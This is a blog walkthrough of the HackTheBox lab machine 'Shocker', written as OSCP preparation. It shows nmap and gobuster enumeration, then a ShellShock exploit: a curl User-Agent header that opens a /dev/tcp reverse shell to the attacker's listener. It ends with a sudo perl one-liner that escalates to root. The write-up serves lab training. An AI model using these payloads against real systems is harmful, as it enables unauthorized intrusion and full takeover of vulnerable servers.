TJ_Null’s OSCP Prep – HTB – Shocker

Byaghanim

This is rated an easy box, and for good reason, however, I spent a good amount of time just enumerating because the initial access was hidden well. For some who have encountered this vulnerability before, this would be a piece of cake, but I had never encountered ShellShock before so I spent a lot of time enumerating. Rooting this box was as simple as one command.

Enumeration

I’ll start off with a nmap scan to get an idea of whats running on the machine. 

└─# nmap -sC -sV 10.10.10.56 -oN nmap.result                                                                                                                                                                    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-11 16:45 EST
Nmap scan report for 10.10.10.56
Host is up (0.031s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesnt have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.58 seconds

Only two ports, 80 and 2222. OpenSSH is using an uncommon port. That however leads no way, so it will be ignored in the remainder of this writeup.

Vising the webserver we are welcomed by this page. A very simple page with not much content. 

 <!DOCTYPE html>
<html>
<body>

<h2>Don't Bug Me!</h2>
<img src="bug.jpg" alt="bug" style="width:450px;height:350px;">

</body>
</html>

Using gobuster to find hidden directories. 

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/12 14:31:38 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 290]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/cgi-bin/             (Status: 403) [Size: 294]
/index.html           (Status: 200) [Size: 137]
/server-status        (Status: 403) [Size: 299]
                                               
===============================================================
2022/01/12 14:31:52 Finished
===============================================================

Nothing noteworthy. After alot of enumeration I started looking at /cgi-bin/. After some googling I found this.

ShellShock

Bash can also be used to run commands passed to it by applications and it is this feature that the vulnerability affects. One type of command that can be sent to Bash allows environment variables to be set. Environment variables are dynamic, named values that affect the way processes are run on a computer. The vulnerability lies in the fact that an attacker can tack-on malicious code to the environment variable, which will run once the variable is received.

https://book.hacktricks.xyz/pentesting/pentesting-web/cgi

How Does ShellShock Work?

In layman’s terms, Shellshock is a vulnerability that allows systems containing a vulnerable version of Bash to be exploited to execute commands with higher privileges. This allows attackers to potentially take over that system.

https://securityintelligence.com/articles/shellshock-vulnerability-in-depth/

So after reading this I editied my gobuster dir search and find a file, user.sh.

                                                                                                                                                                    
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt -x cgi,sh,jpg,txt,html,php -b 403,404
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/cgi-bin/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              cgi,sh,jpg,txt,html,php
[+] Timeout:                 10s
===============================================================
2022/01/12 14:45:13 Starting gobuster in directory enumeration mode
===============================================================
/user.sh              (Status: 200) [Size: 118]
                                               
===============================================================
2022/01/12 14:47:05 Finished
===============================================================

And reading the file. 

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# cat user.sh                                
Content-Type: text/plain

Just an uptime test script

 14:07:18 up 21:24,  0 users,  load average: 0.19, 0.09, 0.03

Initial Access

As we mentioned earlier, the server is vulnerable to ShellShock which is a vulnerability in Bash which would allow us to execute arbitrary commands and gain remote shell on the machine. 

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.10.17/4444 0>&1' http://10.10.10.56/cgi-bin/
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.56] 42834
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ ls
ls
user.sh
shelly@Shocker:/usr/lib/cgi-bin$ pwd 
pwd
/usr/lib/cgi-bin
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
shelly@Shocker:/usr/lib/cgi-bin$ id
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
shelly@Shocker:/usr/lib/cgi-bin$

Root

Getting root on this was extremly easy. After doing the usual enumeration I found that the user Shelly could run perl as sudo. 

shelly@Shocker:/$ sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/$ sudo perl -e 'exec "/bin/sh";'
# id
uid=0(root) gid=0(root) groups=0(root)

Similar Posts

Attacktive Directory CTF [Walkthrough] -THM

Attacktive Directory CTF [Walkthrough] -THM

Byaghanim

https://www.tryhackme.com/room/attacktivedirectory This CTF is more “guided and less challenge based”. Its one of the more interesting Windows rooms I’ve tried on THM. Table Of ContentsEnumerationEnumerating Users via KerberosAbusing KerberosBack to basicElevating Privileges within the Domain Enumeration We start with NMAP scan. # Nmap 7.60 scan initiated Fri Aug 6 12:08:59 2021 as: nmap -sC -sV…